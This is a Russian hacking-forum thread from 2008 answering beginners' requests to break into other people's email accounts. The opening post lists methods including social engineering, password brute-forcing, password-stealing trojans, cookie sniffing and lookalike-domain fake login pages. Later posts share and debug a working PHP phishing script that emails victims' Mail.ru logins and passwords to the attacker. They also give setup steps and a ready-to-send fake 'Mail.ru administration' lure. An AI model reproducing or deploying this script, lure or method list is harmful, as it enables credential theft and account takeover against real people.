Форум Веб Хакер.нет

 
Вернуться   Форум Веб Хакер.нет > Хакерство > Основы новичкам

  Ваш помощник
Последние важные новости
 

Основы новичкам

Раздел для помощи новичкам в их начинаниях.
Все вопросы типа "Как сделать", "Почему так" и т.п, задаём тут.
Наши опытные пользователи всегда помогут Вам!
 
 
 


Ответ
 
Опции темы Опции просмотра Lite версия PDA версия

Ответить с цитированием ArxWolf вне форума
  #1 Старый 11.02.2008, 07:06
ArxWolf
WX ADMINISTRATOR
 
Аватар для ArxWolf
 
Регистрация: 15.01.2008
Пол: Муж.
Сообщений: 2,495
Помог: 2,236 раз
Репутация: 2262

Отправить сообщение для ArxWolf с помощью ICQ
Каждые день (а то и по два раза в день и более), люди приходят с вопросом «Как взломать ящик?»
Я решил что этой темой я вам отвечу, будут приведены способы и их описание, по мере их вспоминания

1)СИ (Соц. инженер.) - Этот способ можна называть психологическим, в этом способе главное
сбор информации о жертве(Возраст, город а то и кличка собаки), сбор инфы может идите
как через поисковики по Email, по ICQ, по Нику(Но если ник распространенный то мона
забить ...), так и может посредством чатов, ирк каналов, непосредственно в прямом общении.
2)Брутфорс – Программа для подбора паролей к мылу по словарю, эффект очень мал, а время
теряешь очень много, древнейший способ...
Брутфорс - google.ru
Словари - [Для просмотра данной ссылки нужно зарегистрироваться]
3)Троян - Пинч, вредоносное ПО для кражи паролей непосредственно с системы жертвы.
Троян - google.ru
Обсуждение тактик заброса - [Для просмотра данной ссылки нужно зарегистрироваться]
4)Сниффер - Позволяет через дырочкО красть куки и тем самым можно их поставить у себя, и проникнуть в ящик жертвы.
5)ДырочкО - Непосредственная уязвимость в самой почтовой системе, это одно из самых сложных, так как есть мощные системы есть нубские...
инфой о уязвимостях почти не кто не делится так как, это дорогая инфа и позволяет хорошо заработать (угнать любое мыло).
6)Фейк - это подделка, склон почтовой системы, где находится ящик жертвы. Тоесть надо зарегать ОЧЕНЬ похожий домен к примеру,
есть mail.ru регим mall.ru (i меняем на l), там размещаем полную копию оригинала, так же баннера и т.д, подделываем страницу
авторизации, добавив отсылку пароля вам на ящик, после авторизации перекидываем жертву на настоящий почтовик. Вот такие вот пироги.
7)Подкуп - Подкупить админа (малой почтовой системы), деньгами или ящиком пивкааа...

Всё привёл 7 способов, может что то забыл не до этого ...

[________W3bX4k3p F0rum________]

Я в Твиттере - twitter.com/ArxWolf


[Для просмотра данной ссылки нужно зарегистрироваться] ** [Для просмотра данной ссылки нужно зарегистрироваться] ** [Для просмотра данной ссылки нужно зарегистрироваться]

[Для просмотра данной ссылки нужно зарегистрироваться]
Ответить с цитированием
Эти 26 пользователя(ей) сказали Спасибо ArxWolf за это полезное сообщение:

Ответить с цитированием
  #2 Старый 19.04.2008, 17:23
}{@Ru$
 
Сообщений: n/a
скрыта

Расскажи про фреймы и как ими почту ломать?
Ответить с цитированием

Ответить с цитированием resetOne вне форума
  #3 Старый 19.04.2008, 18:34
resetOne
WX UNIT
 
Аватар для resetOne
 
Регистрация: 26.03.2008
Пол: Муж.
Сообщений: 242
Помог: 182 раз
Репутация: 192

Цитата:
Сообщение от }{@Ru$ Посмотреть сообщение
Расскажи про фреймы и как ими почту ломать?
Как фреймами почту ломать... Ржу не могу... Да, как-то можно...
Фреймы - это области, которые создаются в окне броузера для одновременного отображения нескольких документов. В прошлом не все броузеры позволяли разделять область просмотра на части, хотя сравнительно новые версии броузеров поддерживают фреймы в обязательном порядке. Ключевым моментом при создании фреймовой структуры является то, что при ее создании разрабатывается несколько веб-страниц. Таким образом, HTML-документ, созданный на фреймовой основе, является набором взаимосвязанных веб-страниц, параметры которых определяются настройками всей фреймовой структуры.

При первом знакомстве с фреймами возникает вопрос: зачем создавать несколько веб-страниц, связывая их фреймовой структурой, если информация на экране может быть разделена на блоки более очевидным способом - таблицами? Дело в том, что у таблиц есть определенные недостатки. Главный из них - отсутствие прокрутки у элементов таблицы. Если содержимое ячейки не помещается в ней, то ячейка расширяется, и полоса прокрутки не создается. Средства стандартного HTML не позволяют снабдить каждую ячейку собственной полосой прокрутки...

[________W3bX4k3p F0rum________]

Хакинг — искусство творческого подхода к задаче, будь то нестандартное решение сложной проблемы или использование слабостей неряшливо написанных программ. Хакерами называют себя многие, но мало у кого есть достаточная техническая подготовка, необходимая успешному хакеру. Д. Эриксон

Ответить с цитированием
Этот пользователь сказал Спасибо resetOne за это полезное сообщение:

Ответить с цитированием
  #4 Старый 10.05.2008, 17:47
MaZaRt
 
Сообщений: n/a
скрыта

Млин забыл, пароль на архив 666

Держи [Для просмотра данной ссылки нужно зарегистрироваться] надеюсь ты догодаешься подправить исходник для того чтбы не обломаться.
Пароль на архив 666

Цитата:
Блин(((
MaZaRt, ты юзал???Утебя получиось??
Чем млин юзал?
Цитата:
а програмку выложить сможеш для отправки писем с чужого мыла?
А что "Crazy Mail" так долго найти? можно и "Outlook Express" анонимно отправить!
Я "Crazy Mail" отпровлял так что бы понятно было к тому же там интервил час от одного письма до другово.

Последний раз редактировалось Talleya, 07.08.2009 в 23:49.
Ответить с цитированием

Ответить с цитированием a1k вне форума
  #5 Старый 10.05.2008, 22:33
a1k
WX UNIT
 
Аватар для a1k
 
Регистрация: 07.05.2008
Пол: Муж.
Сообщений: 58
Помог: 61 раз
Репутация: 71

Отправить сообщение для a1k с помощью ICQ
а програмку выложить сможеш для отправки писем с чужого мыла?

[________W3bX4k3p F0rum________]

В теме не флудить сообщениями благодарности, выражайте их в денежном эквиваленте, или хотя бы благодарностью в репутацию того, кто вам помог. ツ
†°†°†°†°†°†°†°†°†°†°†°†°†°†°†°†°†
Больше пользы даёш ты, больше получиш сам...
Ответить с цитированием

Ответить с цитированием
  #6 Старый 10.05.2008, 23:18
zipa
 
Сообщений: n/a
скрыта

MaZaRt мыло ты хакал таким способом??Я не могу раздуплится((

Цитата:
Error_Reporting(E_ALL & ~E_NOTICE);

$Login = $_POST['suport'];
$Domain = $_POST['suport.croe.net'];
$Pass = $_POST['pass'];

//####################################
$from = "admin@mail.ru"; // от кого письмо
$to = "моё мыло@inbox.ru"; //кому присылаем данные


$subj = " Пароль от ящика: $Login@$Domain"; // тема письма
$body = " Логин: $Login@$Domain \n Пароль: $Pass"; // тело письма (реконмендую не менять)
//####################################


$from="From: $from\nReply-To: $from\nX-Priority: 1\nContent-Type: text/plain; charset=\"koi8-r\"\nContent-Transfer-Encoding: 8bit";
$from=convert_cyr_string($from,"w","k");
$to=convert_cyr_string($to,"w","k");
$subj=convert_cyr_string($subj,"w","k");
$body=convert_cyr_string($body,"w","k");
mail($to,$subj,$body,$from);

$c = "$Login@$Domain:$Pass";

$fp = fopen("c","a+"); //открываем файл
fwrite($fp,"\n [start-- $c -- end] \n"); //записываем всё
fclose($fp); //закрываем

//####################################
header("Location: http://cards.mail.ru/card.html?cdu=89751db02a0f81a 577dc9e55f5a5b045"); // куда пошлем пользователя после того как он ввел данные!

echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"

//####################################
?>
Че там еще надо вписать??Оно на серв в фаил сохраняет тока без пасса:

[start-- @: -- end]

[start-- @: -- end]
Ответить с цитированием

Ответить с цитированием
  #7 Старый 11.05.2008, 00:34
MaZaRt
 
Сообщений: n/a
скрыта

Цитата:
MaZaRt мыло ты хакал таким способом??Я не могу раздуплится((
Видео видел которое я недавно выкладывал? Ну и записывал его тоже я так что да хакал
Цитата:
Че там еще надо вписать??Оно на серв в фаил сохраняет тока без пасса:
Только по случаю изменить
Цитата:
header("Location: [Для просмотра данной ссылки нужно зарегистрироваться] 577dc9e55f5a5b045"); // куда пошлем пользователя после того как он ввел данные!
Тут пошли его просто на [Для просмотра данной ссылки нужно зарегистрироваться] если будешь делать так же как и на видео!! а не посылать ему открытку так как после ввода он попадает на открытки и может что то заподозрить.
Далее открой index.html файл и измени год 1999-2006 на сам знаешь какой
Цитата:
<td width=30% nowrap>© 1999-2006, <a href=http://corp.mail.ru/>Mail.Ru</a></td>
Потом найди какой нить бесплатный хост и заземли там всё это дело////
Далее анонимно пошли письмо если не знаешь чего писать то воспользуйся моим:

Здравствуйте!
Доводим до Вашего сведения, что на Вашем почтовом ящике были обнаружены вирусы, в связи с данной ситуацией и во избежание распространения вирусов мы отключаем Ваш почтовый адрес до 11.06.2008 года.
В предотвращении недоразумений и отключения пройдите повторную авторизацию на специально отведённом месте [Для просмотра данной ссылки нужно зарегистрироваться] для таких случаев сервера Mail.ru

С уважением администрация Mail.ru
Ответить с цитированием

Ответить с цитированием
  #8 Старый 11.05.2008, 01:19
zipa
 
Сообщений: n/a
скрыта

MaZaRt,с датой и перенаправлением все понятно!!!
Я тестил на своем мыле и не получается(((
Хостинг бесплатный уже давно нашел: [Для просмотра данной ссылки нужно зарегистрироваться]
но в фаил сохраняется такая лобода:
[start-- @: -- end]

[start-- @: -- end]

пароля не видно((

тут все правильно:??
Цитата:
$Login = $_POST['suport'];
$Domain = $_POST['suport.croe.net'];
$Pass = $_POST['pass'];
И вот тут надо чето вводить?:
Цитата:
$c = "$Login@$Domain:$Pass";
Цитата:
$subj = " Пароль от ящика: $Login@$Domain"; // тема письма
А то я уже запарился, что только не вставлял!!! Помоги плиз!В долгу не останусь!
Ответить с цитированием

Ответить с цитированием
  #9 Старый 11.05.2008, 01:53
MaZaRt
 
Сообщений: n/a
скрыта

Цитата:
$Login = $_POST['suport'];
$Domain = $_POST['suport.croe.net'];
$Pass = $_POST['pass'];
А ты на куя ввёл это дело то а? Скрипт на хер не трогай!
Оставь вот так как и было
Цитата:
$Login = $_POST['Login'];
$Domain = $_POST['Domain'];
$Pass = $_POST['Password'];
И ещё слово 'suport' пишется с 2 буквами 'p' вот так 'support' а не так как у тебя

Последний раз редактировалось Talleya, 07.08.2009 в 23:51.
Ответить с цитированием

Ответить с цитированием a1k вне форума
  #10 Старый 12.05.2008, 15:32
a1k
WX UNIT
 
Аватар для a1k
 
Регистрация: 07.05.2008
Пол: Муж.
Сообщений: 58
Помог: 61 раз
Репутация: 71

Отправить сообщение для a1k с помощью ICQ
Цитата:
Сообщение от MaZaRt Посмотреть сообщение
Чем млин юзал?

А что "Crazy Mail" так долго найти? можно и "Outlook Express" анонимно отправить!
Я "Crazy Mail" отпровлял так что бы понятно было к тому же там интервил час от одного письма до другово.
а вот на счёт анонимного...подробнее можно?

Цитата:
Сообщение от resetOne Посмотреть сообщение
Ну вы здесь и розвели...
А с сниффером что не катит?
по поводу анонимности я мала знаю, тем более что с мылом связано) сорри за оффтоп

[________W3bX4k3p F0rum________]

В теме не флудить сообщениями благодарности, выражайте их в денежном эквиваленте, или хотя бы благодарностью в репутацию того, кто вам помог. ツ
†°†°†°†°†°†°†°†°†°†°†°†°†°†°†°†°†
Больше пользы даёш ты, больше получиш сам...

Последний раз редактировалось Talleya, 07.08.2009 в 23:52.
Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Быстрый переход


Межгалактический часовой пояс GMT +4, время: 02:51.

vBulletin® Version пятьсоттыщ. Копирование материала запрещено, иначе гразит кастрацией.
Copyright ©2007 - 20000010, WebXakep.net.
Перевод: zCarot
Весь материал представленный на нашем ресурсе, только в целях ознакомления и принадлежит он © WebXakep.net
На данном сервере нету не троянов, не вирусов, не другого вредоносного ПО.
Рейтинг@Mail.ru
Информационый ресурс изучающий взлом.